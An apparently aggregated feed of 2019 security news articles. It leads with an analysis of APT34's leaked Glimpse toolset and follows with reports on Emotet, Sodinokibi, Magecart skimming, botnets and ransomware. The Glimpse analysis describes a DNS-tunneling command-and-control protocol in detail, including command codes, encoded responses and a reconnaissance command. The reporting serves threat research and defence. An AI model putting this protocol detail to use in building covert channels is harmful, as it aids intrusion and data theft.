The APT34 Glimpse project is maybe the most complete APT34 project known so far, the popular researcher Marco Ramilli analyzed it for us.

Indeed we might observe a File-based command and control (a quite unusual solution) structure, a VBS launcher, a PowerShell Payload and a covert channel over DNS engine. This last feature is the most appreciated characteristics attributed to APT34. But let’s move on and start a quick analysis on it.


Since at least 2014, an Iranian threat group tracked by FireEye as APT34 has conducted reconnaissance aligned with the strategic interests of Iran. The group conducts operations primarily in the Middle East, targeting financial, government, energy, chemical, telecommunications and other industries. Repeated targeting of Middle Eastern financial, energy and government organisations leads FireEye to assess that those sectors are a primary concern of APT34. The use of infrastructure tied to Iranian operations, timing and alignment with the national interests of Iran also lead FireEye to assess that APT34 acts on behalf of the Iranian government. (Source: MISP Project).

On April 19 2019 researchers at Chronicle, a security company owned by Google’s parent company, Alphabet, have examined the leaked tools, exfiltrated the past week on a Telegram channel, and confirmed that they are indeed the same ones used by the OilRig attackers. OilRig has been connected to a number of intrusions at companies and government agencies across the Middle East and Asia, including technology firms, telecom companies, and even gaming companies. Whoever is leaking the toolset also has been dumping information about the victims OilRig has targeted, as well as data identifying some of the servers the group uses in its attacks.

According to Duo, OilRig delivered Trojans that use DNS tunneling for command and control in attacks since at least May 2016. Since May 2016, the threat group has introduced new tools using different tunneling protocols to their tool set” Robert Falcone of Palo Alto Networks’ Unit 42 research team wrote in an analysis of the group’s activities.

Today I’d like to focus my attention on the Glimpse project since, in my personal opinion, it could be considered as the “stereotype” of APT34 (with the data we ‘ve got so far).

The Glimpse Project

The package comes with a README file having as a name “Read me.txt” (note the space). The name per se is quite unusual and the content is a simple guide on how to set a nodejs server and a Windows server who would run the “stand alone” .NET (>v4) application to control infected machines. The infection start by propagating a .VBS script called “runner_.vbs” which is a simple runner of a most sophisticated powershell payload. The Powershell payload is a quite complex script acting several functions. The following image shows its “deobfuscated” main loop.

Glimpse Infection Payload Main Loop

The payload loops waiting for instructions, once a command comes from C2 it starts to perform specific actions and it answers back to C2 by requesting crafted subdomains based on variable $aa_domain_bb. One of the most important functions the payload has implemented is to drop and execute additional toolsets. Indeed this payload is mainly a delivery module with some additional controls entirely based on DNS covert channel.

The $aa_domain_bb variable contains the main domain name for which the C2 acts as authoritative Domain Name Server. While no actions are coming from C2 the infected agent would just periodically “ping” C2 by giving basic informations regarding the victim machines. For example the function aa_ping_response_bb would compose an encoded DNS message ( aa_text_response_bb ) which sends it own last IP address. At this stage we might appreciate two communication ways. The first communication channel comes from the subdomain generation for example: while a second communication channel comes from TXT DNS record such as: control: 95 – ackNo: 0 – aid: 59071d8289 – action: M >>> 59071Md8200089EC36AC95T. Both of them are implemented to carry different informations. One of the most important function is the aa_AdrGen_bb which is the communication manager. It implements the control layer in order to send and to receive control informations such as: commands, bytes received, if the file transfer has been close, and so on and so forth. The decoded actions are stored into the variable aa_act_bb and are the following ones:

Command and Control. Env creation for new connected agents
  • M. If the agent is already registered to C2 this command acts like a ping, it updates basic informations to the corresponding “agent” folder. If it’s the first time the agent connects back to C2 it starts a registration section which enables, server side (command and control side) the building up of an dedicated folders and file environment. Please check the previous image: Command and Control. Env creation for new connected agents.
  • W. This is a TXT request to list the waiting commands (or, if you wish “kind of jobs”). The first command that is executed after the registration phase is the command tagged as 10100 having as a content: “whoami&ipconfig /all”
  • D. Is actually what should be executed. It takes as input the tagged task and it forwards to the requesting Agent the Base64 encoded content of the file.
  • 0. It is not a TXT request. This request makes the authoritative DNS (the command and control) answers to the agent the requested file in the waiting folder. Answering back an A record having as data field a crafted ip ( if no “actions” (fileS) are in the waiting folder the C2 answers back an A record value having as data field “24.125.” + fileNameTmp.substring(0, 2) + “.” + fileNameTmp.substring(2, 5); and time to live a random number between 0 to 360.
  • 1. It is not a TXT request. This request makes the authoritative DNS (the command and control) answer back with the file content. It implements a multiple answering chain, according to RFC4408, to send files greater than 255 characters.
  • 2. It is not a TXT request. This requests makes the authoritative DNS (the command and control) to receive a file from the Agent. It implements a complex multi-part chain for reconstructing partials coming from domain name requests. After sending all of the data, the Agent will issue a final DNS query with “COCTabCOCT” in the data segment. This query notifies the C2 server that the Trojan has finished sending the contents of the file.
Command and Control: COCTabCOCT end of communication

The following image shows a running example of the infection chain run on a controlled virtual environment.You might appreciate the communication layers over the requested domains. For example the following requests would carry on data in subdomain, while the answered IP gives a specific affermative/negative response.


Glimpse running environment

The command and control is implemented by a standalone .NET application working through files. The backend, a nodeJS server, runs and offers Public API and and saves, requests to agents, and results from agents, directly into files named with “UID-IP” convention acting as agent ID. The panel reads those files and implements stats and actions. The following image shows the static configuration section in the C2 panel.

Command and Control Panel Hardcoded Settings

The Control Panel is mainly composed by two .NET Window components. Main Windows where the list of connected Agents is shown within additional informations such as: Agent ID, Agent IP, Agent Last Online Time and Attacker Comments. And Control Window which is called once the attacker clicks on the on a selected Agent. The event onClick spawn the following code:

controlPanel = new controlPanel(, agent.ip, agent.lastActivity);

After its initialisation phase the control panel enables the attacker to write or to upload a list of commands or a file within commands to agents. The following image shows the controPanel function which takes commands from inputs “TextFields”, creates a new file into the waiting folder within commands. The contents of such a folder will be dropped on the selected Agent and executed.

Command and Control, controlPanel insert_command function

The controlPanel offers many additional functionalities to better control single or group of Agents. By focusing on trying to give a project date we might observe the compiled time which happens to be 9/1/2018 at 5:13:02 AM for newPanel-dbg.exe while it happens to be 9/8/2018 at 8:01:54 PM for the imported library called ToggleSwitch.dll.

With High probability we are facing a multi-modular attacking framework where on one side the DNS communication channel delivers commands to the target Agents and on the other side many control panels could be developed and attached to the DNS communication system. It would be quite obvious if you look to that framework as a developer, thus the DNS communication channel uses files to store informations and to synchronise actions and agents, so that many C2 could be adapted to use it as a communication channel. We might think that that many APT34 units would be able to reuse such a communication channel. Another interesting observation might come from trying to date that framework. A powershell Agent as been leaked on PasteBin o August 2018 (take a look here) by an anonymous user and seen, since today, from very few people (197 so far). The used command and control has been compiled the month before (July 2018). The developing technologies (.NET, nodeJS) are very different and the implementation styles differ as well. DNS Communication channel is developed in linear and more functional driven programming style, while the standalone command and control is developed using a little bit more sophisticated object oriented programming with a flavour of agent-oriented programming: the attacker considers the object agentt as an independent agent working without direct control. The attacker writes files as the medium to address the Agent behaviour.

The original post was published on the Marco Ramilli’s blog:

About the author: Marco Ramilli, Founder of Yoroi

I am a computer security scientist with an intensive hacking background. I do have a MD in computer engineering and a PhD on computer security from University of Bologna. During my PhD program I worked for US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive researches in Malware evasion techniques and penetration testing of electronic voting systems.

I do have experience on security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been encharged of testing uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cybersecurity experiences by diving into SCADA security issues with some of the biggest industrial aglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cybersecurity defence center I’ve ever experienced! Now I technically lead Yoroi defending our customers strongly believing in: Defence Belongs To Humans

Edited by Pierluigi Paganini

(Security Affairs – APT34, Glimpse project)

The post APT34: Glimpse project appeared first on Security Affairs.

Victims of ZQ Ransomware can decrypt their files for free

Good news for the victims of the ZQ Ransomware, security experts at Emisisoft have released a free decryptor tool.

Good news for the victims of the ZQ Ransomware, security experts at Emisisoft have released a free decryptor tool that allows them to decrypt files for free.

ZQ Ransomware infected users in the US, India, Polland, Brazil and the UK.

The ZQ Ransomware encrypts victim’s files using the Salsa20 and RSA-1024 algorithms. The malware adds the extension “.[].zq” to the encrypted files.

The ransomware drops a ransom note “{HELP__DECRYPT}.txt” on the victims’ machines, it includes payment instructions. Victims can contact operators behind the ransomware sending a message to the email address “”.

“Below the text of the ransom note “All of _our files are encr_pted* to decr_pt them write me to
Your key:

ZQ ransomware

In order to decrypt the files, victims need to provide an encrypted file and original file to decrypt. The Decryptor tool is available at the following link:

Below the step by step procedure:

  1. IMPORTANT! Make sure you remove the malware from your system first, otherwise it will repeatedly lock your system or encrypt files.
  2. Download the free Emsisoft Decrypter for ZQ.
  3. Run the executable and confirm the license agreement when asked.
  4. Click “Start” to decrypt your files. Note that this may take a while.
  5. All done! Gotta crypt ’em all!

Emsisoft has recently released several tools to help victims of several ransomware, including the CryptoPokemon ransomware, the Planetary Ransomware, the Hacked Ransomware, and the PewDiePie ransomware.

Pierluigi Paganini

(SecurityAffairs – ransomware, decryptor)

The post Victims of ZQ Ransomware can decrypt their files for free appeared first on Security Affairs.

Kodi Hardware Add-on Users, Mostly At Risk With Malware

Kodi used to be a software-only solution that provides a user seeking to share media in a certain geographic area seamless, but the people behind the software went ahead and supplied their patrons with hardware version. This lessened the need for someone to have the technical expertise in setting up a separate PC for media consumption and sharing for the home/neighborhood. Making Kodi just like any other appliance for the home, commoditization brings a bad problem of malware infection, however.

More and more security and privacy organizations distrust the makers of Kodi the software, let alone its appliance counterpart. The Digital Citizen Alliance (DCA) has nothing but the bad comment about Kodi’s hardware, especially of it allegedly being the centerpiece of piracy in the neighborhood. As per their study, Kodi Box, they gray market $100 machine is a dream piracy device of the 270 Americans they have surveyed, but at the same time at risks with a malware infection.

The Kodi software itself, open-source software is not designed for piracy but rather just a tool for sharing content. But most of the users were not keen on checking if the content being shared and used through the software is legal or not.

“By plugging the device into a home network, [users] are enabling hackers to bypass the security designed to protect their system. If apps on the box or that are later downloaded have malware, the user has helped the hacker past network security. (We) uncovered a clever scheme that enabled criminals to pose as well-known streaming sites, such as Netflix, to facilitate illegal access to a legitimate subscription of an actual Netflix subscriber,” explained a Digital Citizens Alliance representative.

DCA has partnered with an IT Security firm, Group sense to monitor black market sales. The latter found evidence of hacker group discussing amongst themselves the feasibility of tapping to Kodi in order to propagate their malware, expand their botnet and the chances of successfully planting a crypto jacking malware to the computers of the victims while sharing content.

Kodi is an open-source software can be extended beyond the features the authors provided it by default. Some versions of Kodi were deliberately rebuilt to include capabilities to attempt a DoS attack against a certain target chosen by the hacking groups. XBMC, the developers of Kodi strongly deny the accusation that their creation is the culprit for helping expand malware infection. XBMC also highlighted the fact that they do not support platform expansion to original Kodi. Such add-on products are creations of their respective vendors and XBMC was not in any way involved with the development of those add-ons, hardware or software.

“If you are selling a box on your website designed to trick users into thinking broken add-ons come from us and work perfectly, so you can make a buck, we’re going to do everything we can to stop you,” said an XBMC representative.

The bottom line, the choice of using Kodi’s unofficial extensions and hardware add-ons is the responsibility of the user. If they purchase those unsupported products, XBMC cannot be blamed for any issue arising for the use of those products.

Also, Read:

BabyShark Malware Targeting Nuclear and Cryptocurrency Industries

Static Malware Analysis Vs Dynamic Malware Analysis

Game of Thrones Downloads Widely Used to Spread Malware

The post Kodi Hardware Add-on Users, Mostly At Risk With Malware appeared first on .

Emotet Trojan Now Uses IoT And Router Devices To Evade Detection

The Emotet malware has been frequently covered here in since July last year. It is not uncommon for a cyber security-centered website to discuss most if not all of its infection instances since it is a very complex banking trojan which continues to receive enhancements from its authors. This time around, we will cover Emotet’s newest campaign targeting that began two months ago, as it targets vulnerable IoT devices and routers in order to grow the botnet further. By using vulnerable routers and IoT devices, Emotet can use them to camouflage its fleet of zombified desktop, laptop, and server.

With the addition of new members of the botnet, the heavy hitters (laptop, desktop, and servers) can now send data to the series of IoT and router members of the botnet before it reaches the actual command and control servers. This way, the discovery of the C&C servers is harder for the security researchers, as the path of the data transfer gets obscured by the thousands.

“Recently, an analysis of Emotet traffic has revealed that new samples use a different POST-infection traffic than previous versions. It is also attempting to use compromised connected devices as proxy command and control (C&C) servers that redirect to the real Emotet C&Cs. These changes may seem trivial at first, but the added complexity in command and control traffic is an attempt by Emotet authors to evade detection. These discoveries also show that the malware is being used to compromise and collect vulnerable connected devices, which could become resources for other malicious purposes,” explained a TrendMicro blog.

The newly updated Emotet malware not only depend on spam emails to spread as it had always been, certain copies of Emotet malware that TrendMicro got a hold of showed an indication that is using another trojan in order to propagate. Named Powload AKA Trojan.W97M.POWLOAD, as it executes it takes advantage of a Windows Powershell command in order to download the rest of Emotet into the system. Also, the spam emails campaign that carries Emotet were made more convincing, as the malicious attachment is in a password-protected zip format. The user is then instructed to open the file with the provided password in the body of the email. This method helps makes the email attachment sound legitimate, as many legitimate emails with clean attachments use such technique in sending files to multiple users.

“Newer traffic shows something different. Actors stayed away from using the Cookie header and changed the HTTP request method to POST. The data is still encrypted with an RSA key and AES, and encoded in Base 64. However, instead of being stored in the Cookie value, it was put in the body of the HTTP POST message. This change adds another layer of complexity to help the malware evade detection or delay further investigation if it is detected,” added TrendMicro.

As more and more command and control servers are made online by the Emotet hacking group, the harder it is to identify the perpetrators of the malware. TrendMicro detected instances where they were led to C&C-like behavior, but it turns out it was just an infected router, another one was a Digital Video Recorder that so happened to be online and infected by Emotet as well. This created a situation where Emotet itself is artificially creating multiple numbers of dummy nodes in order to seriously bypass detection.

Related Resources:

This Version Of Emotet Trojan Has A Spreader Feature

Multimedia Editing Software Hacked to Spread Banking Trojan

Redaman Banking Trojan of 2015 Resurrects, Targets Russian Email Users

Banking Trojan Made in Brazil? A Brief Look

The post Emotet Trojan Now Uses IoT And Router Devices To Evade Detection appeared first on .

Crooks exploit Oracle WebLogic flaw to deliver Sodinokibi Ransomware

Threat actors are exploiting a recently patched critical Oracle WebLogic Server vulnerability to deliver the Sodinokibi ransomware to organizations.

Threat actors are delivering a new piece of malware, tracked as
Sodinokibi, by exploiting a recently patched Oracle WebLogic Server vulnerability.

Oracle WebLogic Server is a Java EE application server currently developed by Oracle Corporation, it is used by numerous applications and web enterprise portals based on Java technology. The flaw initially received the identifier CNVD-C-2019-48814.

An attacker could exploit the vulnerability to remotely execute commands without authorization by sending a specially crafted HTTP request.

On April 26, Oracle addressed the flaw with the release of an out-of-band update.

The threat was detected and analyzed by several firms (i.e. South Korean EST Security, Cisco’s Talos), independent researchers, intelligence group.

“Oracle first patched the issue on April 26, outside of their normal patch cycle, and assigned it CVE-2019-2725. This vulnerability is easy for attackers to exploit, as anyone with HTTP access to the WebLogic server could carry out an attack. Because of this, the bug has a CVSS score of 9.8/10.” reads the analysis published by Cisco Talos.” Attackers have been making use of this exploit in the wild since at least April 17. “

Sodinokibi ransomware

Crooks used PowerShell commands to download and execute malicious payloads, they demanded a ransom that ranges from $1,500 worth of BitCoin up to $2,500. The ransom doubles if the victims do not pay it within a specified number of days.

Talos started seeing the first stages of the Sodinokibi attacks — the attackers first looked for exploitable WebLogic servers —

Since April 25, one day before Oracle released security patches, the experts started observing Sodinokibi ranomware infections.

Talos also noted that threat actors were exploiting the flaw to deliver the popular Gandcrab ransomware.

“We find it strange the attackers would choose to distribute additional, different ransomware on the same target. Sodinokibi being a new flavor of ransomware, perhaps the attackers felt their earlier attempts had been unsuccessful and were still looking to cash in by distributing Gandcrab,” continues Talos researchers.

Experts discovered that the CVE-2019-2725 has been also exploited to deliver cryptocurrency miners and other types of malware. Researchers believe it has also likely been exploited in targeted attacks.

“Due to the ubiquity of Oracle WebLogic servers and the ease of exploitation of this vulnerability, Talos expects widespread attacks involving CVE-2019-2725 ” concludes Talos.

Pierluigi Paganini

(SecurityAffairs – sodinokibiransomware, Weblogic)

The post Crooks exploit Oracle WebLogic flaw to deliver Sodinokibi Ransomware appeared first on Security Affairs.

BabyShark Malware Targeting Nuclear and Cryptocurrency Industries

In 2018 Palo Alto Networks’ Unit 42 researchers announced that they have identified a spear phishing campaign that is targeting U.S. National security think tanks and academic institutions. Research indicates that the “threat actor might have interests in gathering intelligence related to not only North Korea but possibly wider in the Northeast Asia region.”

According to Unit 42, the spear phishing emails contain malware called BabyShark that “shares infrastructure with playbooks associated with North Korean campaigns.”

However, as reported in cyware the activities of the malware has expanded and it is being used for other malicious purposes.

What’s the matter – According to researchers the operators of BabyShark malware are now targeting cryptocurrency industries with an intent to make some profit.

The recent activities of the malware observed from March 2019 to April 2019 include:

  • Espionage on nuclear security and the Korean peninsula’s national security issues;
  • Financial gain by infiltrating cryptocurrency industries

In addition to this, the malware has been found using two other malware as secondary payloads. They malware used as secondary payloads – KinJongRAT and PCRat – are referred to as ‘Cowboys’.

How is it done – The attackers are using spear phishing or watering hole attacks to target users. In the case of spear phishing, a malicious link is sent attached within an email. Whereas, in the watering hole attack, the victims are redirected to a malicious go Microsoft link.

Once the BabyShark malware is launched, the malware unleashes its multi-stage infection chain by performing checks between each stage. This ensures only targeted hosts are advanced to the next stage before it finally beacons back to the attackers.

“This is done by maintaining a list of blacklisted IP addresses and computer names for those who have made suspicious access attempts, such as access with invalid parameters, to the server as a possible technique meant to make analysis harder. The IP addresses and computer names in the blacklist are written in base64 encoded format at [BASE_URI]/blackip.txt,” researchers explained in a blog post.

About the Cowboys – The secondary payloads are delivered as:

  • EXE loader
  • DLL loader

One encoded payload

“The functionality of the EXE and DLL loaders is the same: the only difference is the file type. These loaders are later run upon receiving an execution command: ‘execute’ to invoke the EXE type loader or ‘power com’ to launch the DLL type loader. We theorize the reason for having two different type loaders is to have redundancy for loading the payload in case of anti-virus software’s disruption. Either loader will load the custom encoded secondary payload, the Cowboy, in memory, decode it, and execute it,” the researchers said.

The information that the KimJongRAT steals from victim machines includes email credentials from Microsoft Outlook and Mozilla Thunderbird. The malware also pilfers system’s OS version along with login credentials for Google Facebook and Yahoo.

PCRat is a variant of the Gh0stRAT malware family. It is a remote administration trojan whose source code is openly available on the internet.

The bottom line – The malware’s evolving activities show that the malware author has made certain efforts to expand its operations to target the cryptocurrency industries. The threat actors are also leveraging other commodity and custom developed tools in this campaign.

Related Resources:

Static Malware Analysis Vs Dynamic Malware Analysis

What’s New With Separ Malware Family in 2019

The Impact of Cryptocurrency Attacks on Cryptocurrency Exchange

How to Prevent Cryptocurrency Mining Infection

Puma Australia Hit With Credit Card Hack Malware

The post BabyShark Malware Targeting Nuclear and Cryptocurrency Industries appeared first on .

Puma Australia Hit With Credit Card Hack Malware

Sophisticated malware was planted by hackers on Puma Australia’s website, with the intention to steal customer’s credit card information at checkout, a security researcher found.

A suspicious code tucked away on Puma Australia’s page containing a script that logged people’s credit card numbers, names, and addresses when they typed them in on the website. The code sent victims’ data over to a server registered in Ukraine, said Willem de Groot, Sanguine Security forensic analyst.

To a request for comment, Puma didn’t immediately respond when the security researcher notified them about this attack.

The skimming campaign is made up of multiple hacking groups, and Puma is the latest in a long line of businesses hit with credit card skimming malware. A massive hacking operation is targeting online shops connected to Magecart.

This is the kind of malware that goes after popular websites with vulnerabilities. The earlier victims include the Atlanta Hawks, British Airways, and NewEgg, among many other businesses targeted by Magecart over the past few years.

“The single largest problem with Magecart is that consumers have absolutely no way to know that they got skimmed until it’s too late and that merchants lack the tools to properly deal with this,” de Groot said.

Puma is one of the top sportswear brands in the world, with sales reaching $4 billion in 2018, according to financial reports. In the last year, Puma saw major growth in the Asia/Pacific region, where its Australian team operates.

Puma’s popularity as a worldwide brand makes it a prime target for Magecart attackers. De Groot said he found the malware through a detection tool he developed, which finds Magecart code embedded on hundreds of stores a day.

The security researcher de Groot said, “The skimmer found on Puma Australia’s website was one of the most sophisticated ones he had seen yet.”

This skimmer was able to camouflage itself by using typical code like “optEmbed” and “selectDuration.” Typically, skimmers have to be specifically tailored for the payment system it’s targeting, but de Groot found that this skimmer on Puma Australia’s website was a jack of all trades.

He said he’s found 77 other stores online with this new kind of skimmer from Magecart. It supports payment systems across the world, indicating a collaborative effort between hackers internationally.

“It has adapters for over 50 payment gateways, which means that the owner can deploy it quickly to newly hacked stores,” de Groot said in a message. “It clearly took a massive effort to build support for all these payment systems.”

Related Resources:

Vulnerability Helps Researchers Expose Malware C&C Servers

What’s New With Separ Malware Family in 2019

Hackers Surgically Infected Asus Computers with Malware

4 Most Recognizable Android Antimalware Apps You Can Install Today

The post Puma Australia Hit With Credit Card Hack Malware appeared first on .

ElectrumDoSMiner botnet reached 152,000 hosts

Researchers at Malwarebytes are monitoring the evolution of the ElectrumDoSMiner DDoS botnet that reached 152,000 infected hosts.

MalwareBytes researchers are closely monitoring attacks against users of the popular Electrum Bitcoin wallet, in particular, the evolution of the Electrum DDoS botnet.

In mid-April, experts at MalwareBytes published a report warning of cyber attacks against users of the popular Electrum Bitcoin wallet. According to the experts, crooks already netted over 771 Bitcoins, an amount equivalent to approximately $4 million USD at current exchange rates.

Since that analysis, cyber criminals have stolen other funds reaching USD $4.6 million, but the most concerning aspect of the story is that and the botnet they used continues to grow. On April 24, the botnet was composed of less than 100,000 bots, but the next day the number peaked at 152,000.

“Since our last blog, the amount of stolen funds has increased to USD $4.6 million, and the botnet that is flooding the Electrum infrastructure is rapidly growing.” reads the analysis published by MalwareBytes. “Case in point, on April 24, the number of infected machines in the botnet was just below 100,000 and the next day it reached its highest at 152,000, according to this online tracker. Since then, it has gone up and down and plateaued at around the 100,000 mark.”

The experts already monitored two malware campaigns respectively leveraging the RIG exploit kit and the Smoke Loader to deliver the ElectrumDoSMiner.

MalwareBytes also detected a previously undocumented tracked as Trojan.BeamWinHTTP that was used by crooks to deliver the ElectrumDoSMiner (transactionservices.exe).

The experts believe that there are many more infection vectors beyond the above loaders they discovered.

Most of the ElectrumDoSMiner infections were observed in Asia Pacific region (APAC), Brazil and Peru.


“The number of victims that are part of this botnet is constantly changing. We believe as some machines get cleaned up, new ones are getting infected and joining the others to perform DoS attacks.” continues the report. “Malwarebytes detects and removes ElectrumDoSMiner infections on more than 2,000 endpoints daily.”

Further technical details, including Indicators of Compromise (IoCs), are reported in the analysis published by MalwareBytes.

Pierluigi Paganini

(SecurityAffairs – ElectrumDoSMiner, botnet)

The post ElectrumDoSMiner botnet reached 152,000 hosts appeared first on Security Affairs.

Companies face regulatory fines and cybersecurity threats, still fail to protect sensitive data

22% of a company’s folders are accessible, on average, to every employee, according to the new report from the Varonis Data Lab, which analyzed more than 54 billion files. The report shines a light on security issues that put organizations at risk from data breaches, insider threats and crippling malware attacks. Key findings from the 2019 Global Data Risk Report include: Out-of-control permissions expose sensitive files and folders to every employee: 53% of companies had … More

The post Companies face regulatory fines and cybersecurity threats, still fail to protect sensitive data appeared first on Help Net Security.

Ransomware In Cleveland Hopkins Airport, Is There A Cover-up?

The world is still suffering from ransomware, even after the growth of its less noisy cousin, the crypto jacking malware. Cleveland Hopkins International Airport is the latest high-profile installation that suffered a ransomware attack. The mayor’s office, headed by Mayor Frank Jackson called it an “isolated technical issue,” as it tried to calm the public while proving to everyone that the airport remains operational. However, the actual systems affected by the malware are the airport’s digital records storage, email and payroll systems. While the only visible indication that there is something wrong with the airport is the flight display screens which display arriving and departing flights.

“On April 21, the malware was discovered on several Cleveland Hopkins International Airport computing systems. As a result, the Flight Information Display, Baggage Information Display, and email systems were impacted. These systems were not accessed by any unauthorized personal (hacked) and there were no ransom demands,” said the Mayor’s office.

At the time of this writing, the FBI is on the case to determine the threat actors who were responsible with the ransomware attack. It was described by the Mayor’s office as: “It was called by the city and that it is cooperating in the assessment of the problems.” Mayor Jackson’s reasoning is not acceptable to the knowledgeable sectors of the public that realize that something was off with how the airport operated. Airplanes take-off and touch down as normal, hence the infection incident have no direct impact on passengers.

“The FBI was contacted by city and airport officials, a collaborative assessment is being conducted to determine the cause of the technical issues. Additional information is not available at this time and will be released when appropriate,” explained Vicki Anderson, Cleveland Federal Bureau of Investigation.

The FBI assures the public that the baggage and flight information systems will be restored at the soonest possible time, including the email systems used by the airport’s employees.

“You usually wouldn’t bring in the FBI if you just had a hard drive that failed. If a system was off-line because of a power outage or a bad power supply, you’d call the vendor of that system and you’d bring it in and you’d be back up and running shortly. The fact that they have made a public statement that the FBI is involved and that the FBI does have an internet crime division, it makes us speculate there was some type of electronic or computer fraud that was taking place,” said Paul Sems of Trusted Sec.

Also, Read:

Bad Actors Still Raking Profit From Ransomware

Still No Solution: Ransomware Attack Against Wolverine Solutions Group

Norsk Hydro Has Fallen Victim To A Serious Ransomware

Community Efforts Against Ransomware

The post Ransomware In Cleveland Hopkins Airport, Is There A Cover-up? appeared first on .

New Emotet variant uses connected devices as proxy C2 servers

Researchers at Trend Micro have uncovered a malware campaign distributing a new Emotet Trojan variant that compromises devices and uses them as Proxy C2 servers.

Trend Micro discovered a new variant of the Emotet Trojan that is able to infect devices and use them as proxy command-and-control servers. The new variant also employs random URI directory paths to evade network-based detection rules.

“Recently, an analysis of Emotet traffic has revealed that new samples use a different POST-infection traffic than previous versions. ” reads the analysis published by Trend Micro. “It is also attempting to use compromised connected devices as proxy command and control (C&C) servers that redirect to the real Emotet C&Cs. These changes may seem trivial at first, but the added complexity in command and control traffic is an attempt by Emotet authors to evade detection. “

The experts also noticed that threat actors behind the latest Emotet campaign are actively attempting to compromise IoT devices, including routers, IP cameras, webcams, and recruit them in a first layer of the C2 infrastructure.

The compromised devices could be used by threat actors for other malicious purposes.

Emotet is delivered via spam campaigns, one of the attacks monitored in early April leveraged the Powload trojan downloader to drop the threat. The spam emails use malicious ZIP file that can be opened with the 4-digit password included in the body of the email. The ZIP archive contains variants of Powload that uses Powershell to download an executable the final Emotet payload.

Emotet 1

Since March 15, experts monitored Emotet samples using new POST-infection traffic and discovered they were also using randomly generated URI directory paths in its POST requests to evade network-based detection

The new Emotet version sends the stolen info within the HTTP POST message body, instead of using the Cookie header. Like previous versions, it encrypts data with an RSA key and AES, and encoded it in Base 64.

Emotet traffic

“The change in POST-infection traffic and the use of these connected devices show that Emotet is still a constantly evolving and resilient threat.” concludes Trend Micro.

“The malware authors are fine-tuning evasion techniques and trying to adapt to security solutions. If left unchecked and undetected, this threat may lead to a substantial loss of money and data for businesses.”

Pierluigi Paganini

(SecurityAffairs – cybercrime, malware)

The post New Emotet variant uses connected devices as proxy C2 servers appeared first on Security Affairs.

TLS Fingerprinting in the Real World

To protect your data, you must understand the traffic on your network.  This task has become even more challenging with widespread use of the Transport Layer Security (TLS) protocol, which inhibits traditional network security monitoring techniques.  The good news is that TLS fingerprinting can help you understand your traffic without interfering with any of the security benefits TLS brings to applications and complements current solutions like Encrypted Traffic Analytics [9].   To help our customers better understand the benefits of the approach, and to help drive the development and adoption of defensive uses of traffic analysis, the Advanced Security Research team of Cisco’s Security and Trust Organization has published a large set of fingerprints [1] with the support of the Cisco Technology Fund.

Transport Layer Security (TLS) fingerprinting is a technique that associates an application and/or TLS library with parameters extracted from a TLS ClientHello by using a database of curated fingerprints, and it can be used to identify malware and vulnerable applications and for general network visibility. These techniques gained attention in 2009 with mod_sslhaf [2], in 2012 with SSL fingerprinting for p0f [3], in 2015 with FingerprinTLS [4], and most recently with JA3 [5].  We have been using this approach at Cisco since 2016 [6].  The attention given to TLS fingerprinting has been warranted because it is a proven method that provides network administrators with valuable intelligence to protect their networks. And while more of the TLS handshake goes dark with TLS 1.3, client fingerprinting still provides a reliable way to identify the TLS client. In fact, TLS 1.3 has increased the parameter space of TLS fingerprinting due to the added data features in the ClientHello. While there are currently only five cipher suites defined for TLS 1.3, most TLS clients released in the foreseeable future will be backwards compatible with TLS 1.2 and will therefore offer many “legacy” cipher suites. In addition to the five TLS 1.3-specific cipher suites, there are several new extensions, such as supported versions, that allows us to differentiate between clients that supported earlier draft implementations of TLS 1.3.

Why is our approach different?

But here’s the catch: the visibility gained by TLS fingerprinting is only as good as the underlying fingerprint database, and until now, generating this database was a manual process that was slow to update and was not reflective of real-world TLS usage. Building on work we first publicly released in January 2016 [6], we solved this problem by creating a continuous process that fuses network telemetry with endpoint telemetry to build fingerprint databases automatically. This allows us to leverage data from managed endpoints to generate TLS fingerprints that give us visibility into the (much larger) set of unmanaged endpoints and do so in a way that can quickly incorporate information about newly released applications. By automatically fusing process and OS data gathered by Cisco® AnyConnect® Network Visibility Module (NVM) [7] with network data gathered by Joy [1], our system generates fingerprint databases that are representative of how a diverse set of real-world applications and operating systems use network protocols such as TLS. We also apply this process to data generated from Cisco Threat Grid [8], an automated malware analysis sandbox, to ensure that our system captures the most recent trends in malware. With ground truth from multiple sources like real-world networks and malware sandboxes, we can more easily differentiate fingerprints that are uniquely associated with malware versus fingerprints that need additional context for a confident conviction.

Our internal database has process and operating system attribution information for more than 4,000 TLS fingerprints (and counting) obtained from real-world networks (NVM) and a malware analysis sandbox (Threat Grid). The database also has observational information such as counts, destinations, and dates observed for more than 12,000 TLS fingerprints from a set of enterprise networks. We have open sourced a subset of this database that, at more than 1,900 fingerprints (and counting), is the largest and most informative fingerprint database released to the open-source community.   This database contains information about benign processes only; we are not able to publish fingerprints for malware at this time.

Given the records generated from the data fusion process, we report all processes and operating systems that use a TLS fingerprint, providing a count of the number of times we observed each process or operating system using the TLS fingerprint in real-world network traffic. This schema gives a more realistic picture of TLS fingerprint usage (in other words, many processes can map to a single fingerprint with some more likely than others).

Another advantage of our database is that it provides as much relevant contextual data per fingerprint as possible. The primary key into our database is a string that describes the TLS parameters that you would observe on the wire, which allows a system generating these keys to provide valuable information even in the case of no database matches. We associate each TLS parameter in the ClientHello with the RFC that first defined that parameter and use this information to report maximum and minimum implementation dates. These dates provide useful context on the age of the cryptographic parameters in the ClientHello and are not dependent on a database match.


We are continuing to develop applications on top of the fingerprint database we are developing, and any input is most welcome. To facilitate collaboration, we have open sourced a subset of the internal TLS fingerprint database along with several python tools as a part of the Joy project [1]. Our open-source contributions include:

  • A fingerprint database that is updated weekly
  • A Joy feature to generate fingerprint strings for TLS flows
  • A set of python programs to identify TLS fingerprints in a packet capture or from a live network interface and generate new TLS fingerprints that can be contributed to the open-source community
  • A web-based user interface to visualize the results of TLS fingerprinting












Researchers develop new technique to identify malware in embedded systems

A technique for detecting types of malware that use a system’s architecture to thwart traditional security measures has been developed by researchers from North Carolina State University and the University of Texas at Austin. The new detection approach works by tracking power fluctuations in embedded systems. “Embedded systems are basically any computer that doesn’t have a physical keyboard – from smartphones to Internet of Things devices,” says Aydin Aysu, co-author of a paper on the … More

The post Researchers develop new technique to identify malware in embedded systems appeared first on Help Net Security.

